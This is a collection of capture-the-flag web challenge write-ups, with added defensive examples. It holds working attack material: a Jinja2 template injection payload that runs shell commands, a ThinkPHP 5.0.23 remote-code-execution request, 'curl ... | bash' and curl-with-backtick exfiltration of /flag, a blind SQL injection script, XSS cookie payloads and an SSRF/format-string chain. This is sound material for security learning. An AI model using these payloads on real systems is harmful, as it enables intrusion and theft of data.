fakegoogle
SSTI (Flask/Jinja2): the template payload reaches os.popen through the config object's globals:
{{ config.__class__.__init__.__globals__['os'].popen('BJD;cat /flag').read() }}
old-hack
ThinkPHP 5.0.23 (tp5.0.23) RCE; POST body:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
duangShell
.index.php.swp leak (the Vim swap file exposes the source). Command execution:
curl ip:port`tac /flag` or curl ip:port | bash
Simple injection
Single quotes, select, mid, and, = and other commonly used characters are filtered. The idea:
End the username with a backslash so it escapes the closing single quote of the username literal; the password field is then evaluated as part of the SQL statement.
The page echoes differently depending on the result, so extract the password character by character with boolean-based blind injection:
import requests

url = 'http://ec358d69-8850-46e2-9f03-63fa94c4cb6b.node3.buuoj.cn/index.php'
text = ''
for i in range(1, 40):
    # Binary search the ASCII code of the i-th password character in (28, 126].
    l = 28
    h = 126
    while abs(h - l) > 1:
        m = (l + h) // 2
        # The trailing backslash in the username escapes its closing quote,
        # so the password value becomes SQL; substr is used because mid is filtered.
        payload = '^ (ascii(substr((password),{},1))>{})#'
        data = {
            'username': 'admin\\',
            'password': payload.format(i, m)
        }
        re = requests.post(url, data=data)
        # 'P3rh4ps' appears in the response when the condition is true
        if 'P3rh4ps' in re.text:
            l = m
        else:
            h = m
    # The loop ends with ascii > l, ascii <= h and h == l + 1, so the code is h.
    text += chr(h)
    print(text)
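From the defender's side, the bisection above leaves a very recognizable trail: one client, a username ending in a lone backslash, and a stream of ascii(substr(...)) > n comparisons with shifting bounds. The following added example (not part of this writeup) parses constructed application-log lines that record the POST body and flags clients that send such probes; the log format and the IPs are assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

# Constructed application-log lines (client IP, method, path, raw POST body); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 POST /index.php username=admin%5C&password=%5E+%28ascii%28substr%28%28password%29%2C1%2C1%29%29%3E77%29%23
10.0.0.5 POST /index.php username=admin%5C&password=%5E+%28ascii%28substr%28%28password%29%2C1%2C1%29%29%3E101%29%23
10.0.0.5 POST /index.php username=admin%5C&password=%5E+%28ascii%28substr%28%28password%29%2C1%2C1%29%29%3E89%29%23
10.0.0.5 POST /index.php username=admin%5C&password=%5E+%28ascii%28substr%28%28password%29%2C2%2C1%29%29%3E77%29%23
10.0.0.9 POST /index.php username=alice&password=hunter2
10.0.0.9 POST /index.php username=bob%5C&password=secret
"""

# Shape of the bisection oracle: ascii(substr(<expr>, i, 1)) followed by a comparison.
ORACLE_RE = re.compile(r"ascii\s*\(\s*substr\s*\(.*?,\s*\d+\s*,\s*1\s*\)\s*\)\s*[<>=]", re.I)


def parse_line(line):
    """Split one constructed log line into (ip, method, path, decoded form fields)."""
    ip, method, path, body = line.split(" ", 3)
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return ip, method, path, params


def is_blind_probe(params):
    """True when the username ends with a lone backslash (escaping the closing quote
    of the SQL literal) and another field carries a character-by-character oracle."""
    user = params.get("username", "")
    escapes_quote = user.endswith("\\") and not user.endswith("\\\\")
    oracle = any(ORACLE_RE.search(v) for k, v in params.items() if k != "username")
    return escapes_quote and oracle


def flag_sources(log_text, threshold=3):
    """Return {ip: probe_count} for clients at or above the threshold."""
    counts = Counter()
    for line in log_text.splitlines():
        ip, method, _path, params = parse_line(line)
        if method == "POST" and is_blind_probe(params):
            counts[ip] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

A single escaped quote with a plain password (the bob line) is not enough on its own; the oracle expression is what distinguishes the probe from a typo.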
Fake pig sets best in the world
The packet capture (Ethereal) contains a hint:
the time has to be replaced with a timestamp, and the UA header set; this site is quite useful for that: https://www2.sal.tohoku.ac.jp/~gothit/ua.html
Schrödinger
This works like a password brute-force: you enter a URL and the site brute-forces it for you; the success rate rises the longer it runs, and at 100 the brute-force is complete. So brute-force test.php directly, then replace the cookie, which is a timestamp in Base64:
LTMwODU2ODY3Nw==
The result is a Bilibili AV number.
xss Light
.git leak; the recovered source:
<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);
The hint asks to pop up the cookie. PHP's built-in Exception class can be used here, because echoing a deserialized Exception prints its message unescaped:
<?php
// Exception::__toString() includes the message, so the script tag is rendered
$a = new Exception("<script>alert(document.cookie)</script>");
//echo serialize($a);
echo urlencode(serialize($a));
Or directly, since echo of a deserialized string outputs it as-is:
echo urlencode(serialize("<script>alert(document.cookie)</script>"));
Related link:
http://blog.ydspoplar.top/2020/03/17/php%E5%8F%AF%E5%88%A9%E7%94%A8%E7%9A%84%E5%8E%9F%E7%94%9F%E7%B1%BB/
elements master
This one takes a bit of imagination: the pages are named after chemical element symbols, so enumerate them:
import requests

url = 'http://7c60a665-40e4-4641-b6aa-81e151788526.node3.buuoj.cn/{}.php'
# Element symbols 1..119 in order ('Tc' corrected at position 43, which was a duplicate 'Te')
s = ['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar', 'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Tc', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te', 'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn', 'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm', 'Md', 'No', 'Lr', 'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']
text = ''
for i in s:
    r = requests.get(url=url.format(i))
    # Only pages that exist contribute a fragment of the flag
    if r.status_code != 404:
        print(i)
        text += r.text
        # print(r.text)
print(text)
File detection
home.php and index.php are found first.
Read the sources through a PHP pseudo-protocol (php://filter).
system.php:
<?php
$filter1 = '/^http:\/\/127\.0\.0\.1\//i';
$filter2 = '/.?f.?l.?a.?g.?/i';
if (isset($_POST['q1']) && isset($_POST['q2']) && isset($_POST['q3']) ) {
    $url = $_POST['q2'].".y1ng.txt";
    $method = $_POST['q3'];
    $str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei<br>";
    echo $str1;
    if (!preg_match($filter1, $url) ){
        die($str2);
    }
    if (preg_match($filter2, $url)) {
        die($str3);
    }
    if (!preg_match('/^GET/i', $method) && !preg_match('/^POST/i', $method)) {
        die($str4);
    }
    $detect = @file_get_contents($url, false);
    print(sprintf("$url method&content_size:$method%d", $detect));
}
?>
home.php:
<?php
setcookie("y1ng", sha1(md5('y1ng')), time() + 3600);
setcookie('your_ip_address', md5($_SERVER['REMOTE_ADDR']), time()+3600);
if(isset($_GET['file'])){
    if (preg_match("/\^|\~|&|\|/", $_GET['file'])) {
        die("forbidden");
    }
    if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
        die("not now!");
    }
    if(preg_match("/.?a.?d.?m.?i.?n.?/i", $_GET['file'])){
        die("You! are! not! my! admin!");
    }
    if(preg_match("/^home$/i", $_GET['file'])){
        die("禁止套娃");
    }
    else{
        if(preg_match("/home$/i", $_GET['file']) or preg_match("/system$/i", $_GET['file'])){
            $file = $_GET['file'].".php";
        }
        else{
            $file = $_GET['file'].".fxxkyou!";
        }
        echo "现在访问的是 ".$file . "<br>";
        require $file;
    }
} else {
    echo "<script>location.href='./home.php?file=system'</script>";
}
admin.php comes first, and reaching it needs SSRF.
system.php accepts three parameters:
q1: unused
q2: the URL to fetch; it must start with http://127.0.0.1/, and ".y1ng.txt" is appended to it
q3: the request method; it only has to start with get or post
Finally file_get_contents() fetches the URL and the result is passed through sprintf. The format string contains $method unescaped, so a %s placed in q3 prints the fetched content; the trailing % pairs with the original %d to form a literal %%. Ending q2 with ?s= pushes the appended .y1ng.txt into the query string:
q1=w4nder&q2=http://127.0.0.1/admin.php?s=&q3=get %s%
This returns the admin.php source:
<?php
error_reporting(0);
session_start();
$f1ag = 'f1ag{s1mpl3_SSRF_@nd_spr1ntf}'; //fake
function aesEn($data, $key)
{
    $method = 'AES-128-CBC';
    $iv = md5($_SERVER['REMOTE_ADDR'],true);
    return base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}
function Check()
{
    if (isset($_COOKIE['your_ip_address']) && $_COOKIE['your_ip_address'] === md5($_SERVER['REMOTE_ADDR']) && $_COOKIE['y1ng'] === sha1(md5('y1ng')))
        return true;
    else
        return false;
}
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
} else {
    echo "<head><title>403 Forbidden</title></head><body bgcolor=black><center><font size='10px' color=white><br>only 127.0.0.1 can access! You know what I mean right?<br>your ip address is " . $_SERVER['REMOTE_ADDR'];
}
$_SESSION['user'] = md5($_SERVER['REMOTE_ADDR']);
if (isset($_GET['decrypt'])) {
    $decr = $_GET['decrypt'];
    if (Check()){
        $data = $_SESSION['secret'];
        include 'flag_2sln2ndln2klnlksnf.php';
        $cipher = aesEn($data, 'y1ng');
        if ($decr === $cipher){
            echo WHAT_YOU_WANT;
        } else {
            die('爬');
        }
    } else{
        header("Refresh:0.1;url=index.php");
    }
} else {
    //I heard you can break PHP mt_rand seed
    mt_srand(rand(0,9999999));
    $length = mt_rand(40,80);
    $_SESSION['secret'] = bin2hex(random_bytes($length));
}
?>
Pass decrypt; it has to equal aesEn($_SESSION['secret'], 'y1ng'). $_SESSION['secret'] is randomly generated. At first the comment (// I heard you can break PHP mt_rand seed) misled me into thinking this was about the pseudo-random seed, but random_bytes is genuinely random. Then notice that the assignment sits in the else branch: as long as the very first request already carries decrypt, the else branch never runs, so $_SESSION['secret'] is still null and the expected ciphertext is aesEn(null, 'y1ng'):
Result: 70klfZeYC+WlC045CcKhtg==, URL-encoded when passed as decrypt.
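The flaw in admin.php is one of ordering: the secret is created only in the else branch, so a first request that already carries decrypt is checked against the token of an empty secret. The added example below (not the challenge's code) models that control flow in Python beside a fail-closed version; it assumes a dict as the session and substitutes HMAC-SHA256 for the AES step, since the bug is in the branch, not the cipher.

```python
import hashlib
import hmac
import secrets

KEY = b"y1ng"  # the key used by aesEn in admin.php


def token_for(secret):
    """Stand-in for aesEn($data, 'y1ng'): HMAC-SHA256 here, because only the control
    flow matters. An empty secret always yields the same, attacker-computable token."""
    return hmac.new(KEY, secret.encode(), hashlib.sha256).hexdigest()


def new_secret():
    """bin2hex(random_bytes(mt_rand(40, 80))): 40..80 random bytes as hex."""
    return secrets.token_hex(secrets.randbelow(41) + 40)


def vulnerable_handler(session, decrypt):
    """Mirrors admin.php: the secret is only set in the else branch, i.e. when no
    decrypt parameter is present, so the comparison may run before it exists."""
    if decrypt is not None:
        data = session.get("secret", "")  # PHP null becomes "" inside openssl_encrypt
        if hmac.compare_digest(decrypt, token_for(data)):
            return "WHAT_YOU_WANT"
        return "denied"
    session["secret"] = new_secret()
    return "secret generated"


def fixed_handler(session, decrypt):
    """Fail closed: create the secret before any comparison and never derive a
    token from a missing one, so the first-request shortcut disappears."""
    if "secret" not in session:
        session["secret"] = new_secret()
        return "secret generated"
    if decrypt is None:
        return "nothing to check"
    if hmac.compare_digest(decrypt, token_for(session["secret"])):
        return "WHAT_YOU_WANT"
    return "denied"
```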